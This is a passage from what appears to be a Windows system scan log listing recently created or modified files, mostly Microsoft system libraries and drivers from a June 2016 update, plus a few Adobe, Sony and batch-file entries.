2016-06-20 13:12 - 2016-04-01 18:00 - 00840704 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-06-20 13:12 - 2016-04-01 17:53 - 00348672 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-06-20 13:12 - 2016-04-01 17:50 - 00737280 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-06-20 13:12 - 2016-04-01 17:41 - 00696832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-06-20 13:12 - 2016-03-31 07:53 - 07446360 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-06-20 13:12 - 2016-03-31 07:51 - 01134776 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-06-20 13:12 - 2016-03-31 05:36 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 22365472 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 19794896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 02757616 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 02412576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 00273264 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2016-06-20 13:12 - 2016-02-08 21:55 - 02712576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 21:15 - 02551808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll
2016-06-20 13:12 - 2016-02-08 21:02 - 01197056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
2016-06-20 13:12 - 2016-02-08 20:43 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 20:40 - 00539648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 20:39 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\stobject.dll
2016-06-20 13:12 - 2016-02-08 20:37 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 20:35 - 00954880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 20:34 - 00667648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 20:33 - 00520192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 19:50 - 03120640 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 18:55 - 02592256 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
2016-06-20 13:12 - 2016-02-08 18:33 - 01278464 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2016-06-20 13:12 - 2016-02-08 18:02 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 18:00 - 00599552 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 17:58 - 00336384 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2016-06-20 13:12 - 2016-02-08 17:55 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 01348096 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 01220096 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 00841728 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 17:48 - 00655872 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 17:47 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2016-06-20 13:12 - 2016-02-08 17:44 - 00955392 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-06-20 13:12 - 2016-02-04 17:57 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\httpprxp.dll
2016-06-20 13:12 - 2016-02-04 17:49 - 00125440 _____ (Microsoft Corporation) C:\Windows\system32\httpprxm.dll
2016-06-20 13:12 - 2016-02-04 17:39 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\adhsvc.dll
2016-06-20 13:12 - 2015-03-13 02:11 - 02162176 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-06-20 13:12 - 2015-03-13 01:39 - 01812992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-06-20 13:09 - 2016-03-08 15:44 - 00138240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-06-20 13:09 - 2016-02-03 16:11 - 01673728 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2016-06-20 13:09 - 2016-02-02 18:15 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2016-06-20 13:09 - 2016-01-07 00:46 - 00148752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscapi.dll
2016-06-20 13:09 - 2016-01-07 00:45 - 00177712 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2016-06-20 13:09 - 2016-01-06 17:47 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2016-06-20 13:09 - 2015-04-08 23:41 - 00158720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rgb9rast.dll
2016-06-20 13:09 - 2015-04-03 01:35 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-04-03 01:14 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-03-13 03:02 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2016-06-20 13:08 - 2016-03-10 18:43 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-06-20 13:08 - 2016-03-10 17:55 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-06-20 13:08 - 2016-03-10 17:42 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-06-20 13:08 - 2016-01-26 20:15 - 00072024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpci.sys
2016-06-20 13:08 - 2016-01-26 15:48 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys
2016-06-20 13:08 - 2016-01-20 23:40 - 00099672 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2016-06-20 13:08 - 2015-10-03 20:41 - 01385280 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-06-20 13:08 - 2015-10-03 20:41 - 01124384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-06-20 13:07 - 2016-03-10 18:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\dsparse.dll
2016-06-20 13:07 - 2016-03-10 17:48 - 00024064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dsparse.dll
2016-06-20 13:07 - 2016-01-22 06:22 - 02487296 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2016-06-20 13:07 - 2016-01-22 06:11 - 01482240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2016-06-20 13:07 - 2015-08-06 18:05 - 00669184 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2016-06-20 13:07 - 2015-08-06 17:37 - 00536576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hhctrl.ocx
2016-06-20 13:07 - 2015-04-25 03:25 - 00020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2016-06-20 13:07 - 2015-02-03 01:03 - 03551744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-02-03 01:02 - 04298240 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01488896 _____ (Microsoft Corporation) C:\Windows\system32\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01464832 _____ (Microsoft Corporation) C:\Windows\system32\mfc42.dll
2016-06-20 13:07 - 2015-01-30 02:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 02:42 - 01204224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42.dll
2016-06-20 13:06 - 2016-03-05 18:44 - 00148480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shacct.dll
2016-06-20 13:06 - 2016-03-05 18:04 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2016-06-20 13:06 - 2016-02-04 19:07 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-04 18:35 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-02 18:18 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2016-06-20 13:06 - 2016-01-10 17:41 - 01707008 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-06-20 13:06 - 2016-01-10 17:31 - 01344512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-06-20 13:06 - 2015-12-30 21:49 - 00470360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-06-20 13:06 - 2015-11-19 15:33 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-06-20 13:06 - 2015-11-19 15:26 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-05-03 16:09 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-06-20 13:06 - 2015-05-03 15:58 - 00210944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-06-20 13:06 - 2015-05-03 15:55 - 00971776 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll
2016-06-20 13:06 - 2015-05-03 15:49 - 00811008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll
2016-06-20 13:06 - 2015-03-06 03:47 - 01696256 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2016-06-20 13:05 - 2016-04-14 16:25 - 02778624 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-06-20 13:05 - 2016-04-14 16:11 - 02464768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-06-20 13:05 - 2016-02-05 20:07 - 00378712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2016-06-20 13:05 - 2016-02-05 16:11 - 00845312 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-06-20 13:05 - 2016-02-05 16:11 - 00422400 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:07 - 00272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:02 - 01083904 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-06-20 13:05 - 2016-02-04 17:23 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2016-06-20 13:05 - 2016-02-04 17:22 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2016-06-20 13:05 - 2016-01-31 20:17 - 00118624 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-06-20 13:05 - 2016-01-31 19:07 - 00110080 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-06-20 13:05 - 2016-01-31 18:42 - 03320832 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-06-20 13:05 - 2016-01-31 18:14 - 03607040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-06-20 13:05 - 2015-10-08 17:11 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2016-06-20 13:05 - 2015-10-08 16:50 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2016-06-20 13:05 - 2015-01-28 03:24 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\StorageContextHandler.dll
2016-06-20 13:05 - 2015-01-28 02:47 - 00060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StorageContextHandler.dll
2016-06-20 13:04 - 2016-02-27 19:28 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-06-20 13:04 - 2016-02-27 18:57 - 03273728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 18:19 - 03820544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 17:32 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-06-20 13:04 - 2015-10-11 07:34 - 00468824 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-06-20 13:04 - 2015-10-11 07:34 - 00462168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00443224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00027992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-06-20 13:04 - 2015-07-09 17:14 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-06-20 13:04 - 2015-04-13 23:37 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\authz.dll
2016-06-20 13:04 - 2015-04-13 23:34 - 00180224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authz.dll
2016-06-20 13:04 - 2015-04-10 01:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-06-20 13:04 - 2015-04-10 01:17 - 01018880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00442712 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00332632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-06-20 13:03 - 2016-03-14 17:50 - 00316760 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2016-06-20 13:03 - 2016-03-10 17:52 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-06-20 13:03 - 2015-07-14 22:59 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2016-06-20 13:03 - 2015-05-11 17:34 - 00332800 _____ (Microsoft Corporation) C:\Windows\system32\fhcpl.dll
2016-06-20 13:03 - 2015-04-16 07:17 - 00325464 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-06-20 13:03 - 2015-03-13 05:03 - 00239424 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-06-20 13:03 - 2015-03-13 05:03 - 00154432 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-06-20 13:03 - 2015-01-30 03:02 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:40 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:37 - 00331776 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00339456 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:16 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:08 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\eappcfg.dll
2016-06-20 13:03 - 2015-01-30 02:06 - 00278016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappcfg.dll
2016-06-20 13:02 - 2016-03-12 01:49 - 02466136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-06-20 13:02 - 2016-03-12 01:47 - 00160160 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-12 01:47 - 00121912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-10 17:55 - 00510976 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2016-06-20 13:02 - 2016-03-10 17:42 - 00413696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2016-06-20 13:02 - 2015-06-11 21:12 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-06-20 13:02 - 2015-05-01 02:13 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2016-06-20 13:02 - 2015-05-01 02:13 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2016-06-20 13:02 - 2015-05-01 02:13 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2016-06-20 13:02 - 2015-04-01 05:21 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 05:18 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2016-06-20 13:02 - 2015-04-01 05:17 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2016-06-20 13:02 - 2015-04-01 05:08 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2016-06-20 13:02 - 2015-04-01 04:46 - 03633664 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 02551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 00903168 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2016-06-20 13:02 - 2015-04-01 03:53 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2016-06-20 13:02 - 2015-04-01 03:53 - 00272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 03:45 - 02749952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2016-06-20 13:02 - 2015-04-01 03:45 - 00699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2016-06-20 13:02 - 2015-04-01 03:14 - 01920000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2016-06-20 13:02 - 2015-04-01 03:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2016-06-20 13:02 - 2014-12-11 06:36 - 00046456 _____ (Microsoft Corporation) C:\Windows\system32\LockScreenContentServer.exe
2016-06-20 13:01 - 2015-12-20 15:56 - 00616960 _____ (Microsoft Corporation) C:\Windows\system32\msra.exe
2016-06-20 13:01 - 2015-10-05 19:28 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2016-06-20 13:01 - 2015-04-23 16:47 - 03084288 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2016-06-20 13:01 - 2015-04-23 16:16 - 02471424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2016-06-20 13:01 - 2015-03-06 04:08 - 02067968 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2016-06-20 13:01 - 2015-03-06 03:43 - 01969664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2016-06-20 13:01 - 2015-02-08 00:57 - 01090048 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2016-06-20 13:01 - 2015-02-08 00:49 - 00791040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2016-06-20 13:00 - 2016-01-05 16:00 - 00570880 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2016-06-20 13:00 - 2015-07-16 19:58 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\NcdAutoSetup.dll
2016-06-20 13:00 - 2015-07-10 20:06 - 00118272 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthpan.sys
2016-06-20 13:00 - 2015-06-09 23:39 - 00081920 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2016-06-20 13:00 - 2015-06-09 23:39 - 00053248 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2016-06-20 13:00 - 2015-06-09 23:38 - 01201664 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2016-06-20 13:00 - 2015-05-12 14:19 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll
2016-06-16 20:21 - 2016-06-16 20:21 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-06-16 19:41 - 2016-06-16 19:41 - 00002325 _____ C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2016-06-16 19:37 - 2016-06-16 19:37 - 00000451 _____ C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2016-06-16 19:36 - 2016-06-14 18:13 - 00828408 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-06-16 19:36 - 2016-06-14 18:13 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-06-16 19:01 - 2015-07-30 15:04 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2016-06-16 19:01 - 2015-07-30 14:48 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-06-16 18:30 - 2016-06-16 18:30 - 00000000 ____D C:\Users\User not found\AppData\Local\Macromedia
2016-06-16 17:45 - 2016-06-16 17:49 - 00000000 ____D C:\Windows\system32\MRT
2016-06-16 17:45 - 2016-06-16 17:45 - 142482544 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-06-15 18:48 - 2016-06-15 18:48 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Publish Providers
2016-06-15 18:34 - 2016-06-15 18:35 - 00006158 _____ C:\Windows\system32\--traceoff
2016-06-15 18:34 - 2016-06-15 18:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sony
2016-06-15 18:34 - 2016-06-15 18:34 - 00000000 _____ C:\Windows\system32\--debugoff
2016-06-15 18:33 - 2016-06-15 18:48 - 00000000 ____D C:\Users\User not found\AppData\Local\Sony
2016-06-15 18:33 - 2016-06-15 18:33 - 00000000 ____D C:\ProgramData\Sony
2016-06-15 18:33 - 2016-06-15 18:33 - 00000000 ____D C:\Program Files\Sony
